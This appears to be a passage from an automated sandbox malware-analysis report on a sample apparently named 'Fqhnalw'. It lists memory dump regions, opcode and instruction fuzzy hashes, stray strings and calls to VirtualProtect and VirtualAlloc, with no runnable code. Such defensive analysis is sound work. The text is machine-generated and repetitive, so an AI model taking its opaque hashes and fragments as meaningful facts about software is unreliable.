                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008

                                                              Control-flow Graph

                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: 70ebd26fba7ea4d5f505fc51831b226fe8b659c8b6cf01ef30fee8abb92ac3ff
                                                              • Instruction ID: 5834459b6c32fd22e98fc5180eafc08e1a83ecd0fe31f95075ce77f730032ab3
                                                              • Opcode Fuzzy Hash: 70ebd26fba7ea4d5f505fc51831b226fe8b659c8b6cf01ef30fee8abb92ac3ff
                                                              • Instruction Fuzzy Hash: D5F1C5B0E05229CFEBA4CF69D844BA9B7B2FB49300F1091EAE40DA7355DB705985CF42

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: 4d1e5008f9281d8518a3bddcd8f919f06c4c990180a7ef430f7403484da6aa93
                                                              • Instruction ID: 1c004a9e0efe8d091c2bbcd238f0469796158efc0734c2e959f85184a3c864b5
                                                              • Opcode Fuzzy Hash: 4d1e5008f9281d8518a3bddcd8f919f06c4c990180a7ef430f7403484da6aa93
                                                              • Instruction Fuzzy Hash: 2BF1D3B0E05269CFEBA4CF69D844B9DB7B2FB49300F1091EAE409A7355EB705985CF42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: S8;
                                                              • API String ID: 0-184023343
                                                              • Opcode ID: 57bf597ae21c158ca47be0f0a52f319321e3bf10545a7f25764f019744f53b72
                                                              • Instruction ID: 0437eed57bf7dc6fcfc14298893caec34eab3b21351c7bbca2e53ac062118de4
                                                              • Opcode Fuzzy Hash: 57bf597ae21c158ca47be0f0a52f319321e3bf10545a7f25764f019744f53b72
                                                              • Instruction Fuzzy Hash: 44B13874E06218CFEB94DFAAD8847AEBBB5FB49300F20916AD009A7395DB345985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c08e7fbc5abbb70394c41b01e4a352d0602a13ccb730339d9ae4117ab78d7ec3
                                                              • Instruction ID: c30c257aa57a26b7f3cb926b2679b9f052c3617e05fc578fb92ab3d52a8c19b3
                                                              • Opcode Fuzzy Hash: c08e7fbc5abbb70394c41b01e4a352d0602a13ccb730339d9ae4117ab78d7ec3
                                                              • Instruction Fuzzy Hash: 51C12574E06259CFEB94DF6AD844BAEBBF6BB49300F1081AAD419A7394DB305D41CF80

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 23 6c05ee7-6c05eeb 24 6c05ef1-6c05efb 23->24 25 6c061ea-6c06251 23->25 24->25 32 6c06254 call 6b280b8 25->32 33 6c06254 call 6b28108 25->33 30 6c06256-6c06266 31 6c06270 30->31 31->31 32->30 33->30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$>
                                                              • API String ID: 0-3953377423
                                                              • Opcode ID: 23cf9341e343aff1f2ea20bf6efdcf5377e3a99fbe3ae6e86944e5950f5a4949
                                                              • Instruction ID: 343e367f18230b88e2db203a5a88127c4fbe1ddd17d0b593907d448179213f1e
                                                              • Opcode Fuzzy Hash: 23cf9341e343aff1f2ea20bf6efdcf5377e3a99fbe3ae6e86944e5950f5a4949
                                                              • Instruction Fuzzy Hash: 2B014C74A012289FEBA5DF54CDA4BECBBB1BF49304F5081D9D509AB290DB719E81CF40
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06BBDBCC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590481977.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6bb0000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: fe8b971cad96b83ea6d83c02dec1dc8098a4f739e52fcab717476faed4c5d2a7
                                                              • Instruction ID: 5bbc67aa85564172f7e2c5d0cf4f0a740dc270d2ac175f2bc4a1fe708b8e6cdf
                                                              • Opcode Fuzzy Hash: fe8b971cad96b83ea6d83c02dec1dc8098a4f739e52fcab717476faed4c5d2a7
                                                              • Instruction Fuzzy Hash: B211E5B19043099FDB10DFAAC484BEEFBF4EF48310F14842AD459A7240C7B99944CFA1
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 06BBEC3B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590481977.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6bb0000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1bff66cc25ec59cb376633225dc24996f9b39ac9439c3cb72956f1590c3693d5
                                                              • Instruction ID: 1e3291dacce90082f7e196d077b4aec5254ec4e43a4c24d2ac195a05df7ef244
                                                              • Opcode Fuzzy Hash: 1bff66cc25ec59cb376633225dc24996f9b39ac9439c3cb72956f1590c3693d5
                                                              • Instruction Fuzzy Hash: 851134B28003098FDB10DFAAC845BEEFBF5EF88320F14881AD559A7250C779A545CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: F
                                                              • API String ID: 0-1304234792
                                                              • Opcode ID: a5688fc5acd238754167301f5ebae645212d1c5fc0e67a7190512dd208498c4c
                                                              • Instruction ID: 24ae8750ec1d34ab3ef4dfc43a5e58ee94b893f30311b31368bcbd529ac1df8c
                                                              • Opcode Fuzzy Hash: a5688fc5acd238754167301f5ebae645212d1c5fc0e67a7190512dd208498c4c
                                                              • Instruction Fuzzy Hash: 13219D74905268CFEBA0DF65D944BEDBBB2AB49300F5085DAD50EA7280DB319E85DF00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %
                                                              • API String ID: 0-2567322570
                                                              • Opcode ID: dbb0b00522e33f9a7f66b768ebdcad03f46763f3f611bfcd0e14a1018f04c2ca
                                                              • Instruction ID: 9410ecbc68e0cc416307ee6e7d0d046c07ada2b12a1f13918d4ffbd9dbe42bcc
                                                              • Opcode Fuzzy Hash: dbb0b00522e33f9a7f66b768ebdcad03f46763f3f611bfcd0e14a1018f04c2ca
                                                              • Instruction Fuzzy Hash: 8D219A74901268CFEB61CF64DD48BEEBBB1AF49305F1484DAD909A7250C7729E86CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 9
                                                              • API String ID: 0-2366072709
                                                              • Opcode ID: 71b9e5a2a6f0c86123527a91d5366d46535995c54b1c79ec6c57d8f560bcc0ab
                                                              • Instruction ID: 6f48f78b341e78f4be01ddc0704eca8ac0c7307a7611208009e4599de9cee957
                                                              • Opcode Fuzzy Hash: 71b9e5a2a6f0c86123527a91d5366d46535995c54b1c79ec6c57d8f560bcc0ab
                                                              • Instruction Fuzzy Hash: E911C9B4A101288FCBA4DF24C89569EBBF5EF4A311F4041EAD64EAB350DB305E84CF05
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L
                                                              • API String ID: 0-2909332022
                                                              • Opcode ID: 082932f5a6576af8baa4ea89f2bd7ed1ffbbd4f3d7970ecf7b14edd0317f82d3
                                                              • Instruction ID: d5cce0f75082f7f4c18ab3f5257b6b7546f92387e193e528bdac0e4f825f7f97
                                                              • Opcode Fuzzy Hash: 082932f5a6576af8baa4ea89f2bd7ed1ffbbd4f3d7970ecf7b14edd0317f82d3
                                                              • Instruction Fuzzy Hash: AFF05AB4D042288FCB64CF24D9857C9BBB1BB58301F1081EAA649A3250DBB02EC0CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m
                                                              • API String ID: 0-3775001192
                                                              • Opcode ID: 894e3bfe22db02e603864e48a79f5fd77450ad3dc81248155e43e249f2c561ca
                                                              • Instruction ID: 26588fb05ce4b8c38d8470a783f167b7d85ff70f7a6b1630bc8e42e93a0b8b3f
                                                              • Opcode Fuzzy Hash: 894e3bfe22db02e603864e48a79f5fd77450ad3dc81248155e43e249f2c561ca
                                                              • Instruction Fuzzy Hash: E1E017B0A11369CFEB11AF64D85834A77B6FF00208F1002959509AB215DF315A658F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m
                                                              • API String ID: 0-3775001192
                                                              • Opcode ID: a10a155aaaec4cfb02d103dfe200e01c06c54972ff42a221d007c0bfd6dba213
                                                              • Instruction ID: c6a1c4b4664e34793a94d81ea805ec3e0d5b14ee3a8cd6bd4abe157c4def7743
                                                              • Opcode Fuzzy Hash: a10a155aaaec4cfb02d103dfe200e01c06c54972ff42a221d007c0bfd6dba213
                                                              • Instruction Fuzzy Hash: A4D05EB0A1037DCFFB51EB64D44475E37B7BB44208F004685D109AB304DB305D548F86
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0e37fab2eba1302f1164657cc0c13aa7be4d14eb864aecda0b2d21331657f15
                                                              • Instruction ID: 63c896021033c6d928a0c64d5ef98078bb17e9a52d25207b0a143f5832152240
                                                              • Opcode Fuzzy Hash: b0e37fab2eba1302f1164657cc0c13aa7be4d14eb864aecda0b2d21331657f15
                                                              • Instruction Fuzzy Hash: 4952E574E0420DCFDB95DFA4D448AAEBBB6FF89310F248055E512ABA90D7349D82CF91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c503ea0c2f89e1f0a4d825160a951f09dbb530a9e9d95acbbf50ec8f11ec4389
                                                              • Instruction ID: ead6ac1d6d134ee0cb3d1309c9c6f5a20f83c48c447eee415e019d281f7fa28a
                                                              • Opcode Fuzzy Hash: c503ea0c2f89e1f0a4d825160a951f09dbb530a9e9d95acbbf50ec8f11ec4389
                                                              • Instruction Fuzzy Hash: 4F224E70F00229CFDB55DFA5D894AAEBBB2FF48300F148156E511AB299EB74DD42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ae85a75cea69d66962ace428ed512c98630f424e7f28be4d10463575ef17652
                                                              • Instruction ID: 82bcd6ab7afc5c0fe5162bf7b8330ea8a288ab28f3271a421762bed0991b2095
                                                              • Opcode Fuzzy Hash: 4ae85a75cea69d66962ace428ed512c98630f424e7f28be4d10463575ef17652
                                                              • Instruction Fuzzy Hash: B822F330D15218CFDF94EFA8C9546ACBBB6BF49301F2084AAD41AAB749DB355E85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bad9596fc67e39da7be540aaf4f66770691ddfd221579917eb7fea58990a94fb
                                                              • Instruction ID: d6af68cc93a64b55bba74bd9bd33b42e15e0879367cb2767e74b293e8e2a4999
                                                              • Opcode Fuzzy Hash: bad9596fc67e39da7be540aaf4f66770691ddfd221579917eb7fea58990a94fb
                                                              • Instruction Fuzzy Hash: 84F1E234E05308DFDBA8EFA4E4946ACBBB6FF49311F24446AE416AB754DB315981CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7b20c1108ef0cc57d9935f06ad3285d6d46eb70763690cf10e426ffca6c1df4
                                                              • Instruction ID: 9c87bc3ae8f8f5671c0af18adcb2ddc56c4ec7b5869472c4b577aa4af25f45e8
                                                              • Opcode Fuzzy Hash: c7b20c1108ef0cc57d9935f06ad3285d6d46eb70763690cf10e426ffca6c1df4
                                                              • Instruction Fuzzy Hash: CAC1F874E10209CFDB58EFA8D4546EDBBB6FF49311F20842AD412ABA54C7346E82CF90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6bd5cbbe8c4e0ab57fdceb32f8d283b7a92c4fcf5afe8b5f3dd12979ca79966
                                                              • Instruction ID: 38975f125146cd430fd263bb4111fa46251cec643709329837d46dc09177c7a2
                                                              • Opcode Fuzzy Hash: d6bd5cbbe8c4e0ab57fdceb32f8d283b7a92c4fcf5afe8b5f3dd12979ca79966
                                                              • Instruction Fuzzy Hash: 7511E6B4A05219CFDBA8DF69D9946ACBBF6EB49300F2050B9900AA7255EF305E84CF44
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f77f37d0070da1ca8491e8bc7785c40e300c7f65e5097ebf7c28472fd6e67bbc
                                                              • Instruction ID: 91cff5a21d0dc0389e8b7847b136933c29d19a423c6270f4d4db228c1618cffe
                                                              • Opcode Fuzzy Hash: f77f37d0070da1ca8491e8bc7785c40e300c7f65e5097ebf7c28472fd6e67bbc
                                                              • Instruction Fuzzy Hash: 8D1130B0A0462CEFEB54DF99E854BADBBB6BB89311F0080A9D409A7744EF305984DF51
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08f4a225d875c89be5cdfe96ba508c9357b94665e6b49642e21ada5cdf8611f0
                                                              • Instruction ID: 9ae42040b6bbba16f4ddc5477cb8745b0159b50848358a5ff6fcf9c7c15534c0
                                                              • Opcode Fuzzy Hash: 08f4a225d875c89be5cdfe96ba508c9357b94665e6b49642e21ada5cdf8611f0
                                                              • Instruction Fuzzy Hash: 79F0F470A0A30CEFC744EBA4F900AEE7BB9EB06201F1001D9E909A7300EB711F00D7A2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4216a8f19756db134ec3b9ed47b0857fb2142cc241cf06fd23b47ecbdb44ef8b
                                                              • Instruction ID: feca65375a69693a6ef03a5d4c87a4d61ca91589293ed57d7d17483c436b30a9
                                                              • Opcode Fuzzy Hash: 4216a8f19756db134ec3b9ed47b0857fb2142cc241cf06fd23b47ecbdb44ef8b
                                                              • Instruction Fuzzy Hash: 9E1158B8A04228CFDB54DF64D88479EBBB2FB68310F4081EAD509A3748DB305E85CF91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6cab6de97da928cbdb03f00407d5aaa4f08e6d41e88c54e1eb76154518d5f7b8
                                                              • Instruction ID: b067a3fa8eb8dd62461287ab642d9a686e6560f32f535a95c3c45183398c74fb
                                                              • Opcode Fuzzy Hash: 6cab6de97da928cbdb03f00407d5aaa4f08e6d41e88c54e1eb76154518d5f7b8
                                                              • Instruction Fuzzy Hash: ED018170E0A248AFC780DF68D8059ADBBB9EB46200F1481EAE808E7242D7715E01DBD1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76c54c5ede64c5a5e8e30a63c8e59a590bd9a042327192b907d7d4d6ba2dd316
                                                              • Instruction ID: 4e279d5d4ddb48ba8954dd8487f822832d1e1641fef6650adf15bfecd13b6aa6
                                                              • Opcode Fuzzy Hash: 76c54c5ede64c5a5e8e30a63c8e59a590bd9a042327192b907d7d4d6ba2dd316
                                                              • Instruction Fuzzy Hash: FBF06870A0924CAFC741DFA4D94099EBBF9EF46200F1181E9D409E7742DA315F419BD1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f13ece59cc637e92addd84d31435f3bb25e19bbbfff5a3c3f14a8622a20d6820
                                                              • Instruction ID: 08bafc8abee7120a49d23673305333d9fdd4ebeaae18ab1987392b7b6de36cb3
                                                              • Opcode Fuzzy Hash: f13ece59cc637e92addd84d31435f3bb25e19bbbfff5a3c3f14a8622a20d6820
                                                              • Instruction Fuzzy Hash: 0DF04C35B0C3656FE3015B64681079BBBF9EFC9310F1500A6F54DDB391DAA2AC40C794
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52b6c2861fe6423ab2d700f96e4cea848ef32cedd3cb5c9745c73469440629d1
                                                              • Instruction ID: 7a4be903e5d2ed4c66281b706784283a6ea132a2a93eef509d2083bf636d8645
                                                              • Opcode Fuzzy Hash: 52b6c2861fe6423ab2d700f96e4cea848ef32cedd3cb5c9745c73469440629d1
                                                              • Instruction Fuzzy Hash: 6CF024B6B0D3A11FE35212746C10365BBA1DBC6204F1800DBE18A8F2E2EA93E806C381
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15e313334a34f99ad46c4e9c77927e19249c3db1ef4cc6945480836a9391138a
                                                              • Instruction ID: 96934a10ce1d5d148b12bf1aac69371c75d00fe6dc89267c5374b4c2df25d0f8
                                                              • Opcode Fuzzy Hash: 15e313334a34f99ad46c4e9c77927e19249c3db1ef4cc6945480836a9391138a
                                                              • Instruction Fuzzy Hash: 41F0B475B042256FE7155615980076BB7A9EBC9710F144469F5099B390EBA2AC41C7C4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4e0c24f6b543d55b0f39b3b2d8464bbe2509197d8128826e1c8f1b59e80575d
                                                              • Instruction ID: ef6d338cb82d5d7d387118dbdbc8906d3bdb42c0f0c8cc7c533f6f6464c17c86
                                                              • Opcode Fuzzy Hash: c4e0c24f6b543d55b0f39b3b2d8464bbe2509197d8128826e1c8f1b59e80575d
                                                              • Instruction Fuzzy Hash: 5D01FB32C0020AEBCF11DF99DC419EEBB75FF89324F048519E95837251D736A6A6DBA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fa436b3ac37f9d2f8b7e206279ed7070aaa589cee96f3d2ca7959987ea5f8f1
                                                              • Instruction ID: b8bca37d2aae2af083ed2466a3a267eb7f394eada54d8398bc572bfc12f06ea4
                                                              • Opcode Fuzzy Hash: 7fa436b3ac37f9d2f8b7e206279ed7070aaa589cee96f3d2ca7959987ea5f8f1
                                                              • Instruction Fuzzy Hash: 1DF090363443559FC3058F6DE884C8ABBADEFDA62071140AAF915CB321DA30D810C761
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae2311d510b80bac66801f61603f41155b046942c334cdee255bbaf7f70d1913
                                                              • Instruction ID: 5ea03d7a265cc8fbf8a0b1c94b6b8525d5c0727cb3bbd4281d5a2c0bcefb876a
                                                              • Opcode Fuzzy Hash: ae2311d510b80bac66801f61603f41155b046942c334cdee255bbaf7f70d1913
                                                              • Instruction Fuzzy Hash: 5001F47CA1421ACFE310EBA9D848BDDBBB6FF45314F0002A5E5449776AEB308901CF80
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d79eedb21a25593aa025d2a7a04306d24f1b2f60626b91c447ec368fd0567b2c
                                                              • Instruction ID: f15291d644a437ae5c9ef87cbfb067e54bb4ad142c70215c334de1e74a0e1344
                                                              • Opcode Fuzzy Hash: d79eedb21a25593aa025d2a7a04306d24f1b2f60626b91c447ec368fd0567b2c
                                                              • Instruction Fuzzy Hash: 65F05E70E09208AFC780DFA8D951AEDBFB4EB49200F1181DAE819D3341D7356B46CB91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f31af745e74dc90d1766d52ef84e4f123ba6a7f51e38a7b6c6e43399700e8904
                                                              • Instruction ID: 1111434fe886801dc6fa6a5e7f7621d502026816095138b007f8939b61a3c835
                                                              • Opcode Fuzzy Hash: f31af745e74dc90d1766d52ef84e4f123ba6a7f51e38a7b6c6e43399700e8904
                                                              • Instruction Fuzzy Hash: D1F0A0B0A0A258EFC755DBA0A8059BD7B3AEF07201F1015D9F80967351CB325E05C796
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80143c323de1fd4ddaa688794ed5e646ce1390ec2eddf223337fc15a65f7f392
                                                              • Instruction ID: 9f8135c112138d761fce0e92b7693cf5b5408166d71e38e261c74f9a74f94c7d
                                                              • Opcode Fuzzy Hash: 80143c323de1fd4ddaa688794ed5e646ce1390ec2eddf223337fc15a65f7f392
                                                              • Instruction Fuzzy Hash: 35F05472E08218EFDB09DBD4E4486DDBFB7EF44210F0690A5E005EB691DB704A81C795
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c2fc4d0a27a58b22ca8474aa3bf7950120b40c869918c7ed40225d58f0a1e0d
                                                              • Instruction ID: 913991a0b4dcdee919e3d92356d3c716438dcbbcec40e7e6b8f117d819b15a6a
                                                              • Opcode Fuzzy Hash: 7c2fc4d0a27a58b22ca8474aa3bf7950120b40c869918c7ed40225d58f0a1e0d
                                                              • Instruction Fuzzy Hash: 47F0C431C0060AABCF05AF99D8019EEBB75FF89324F008519E95827250D731A6A6DB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
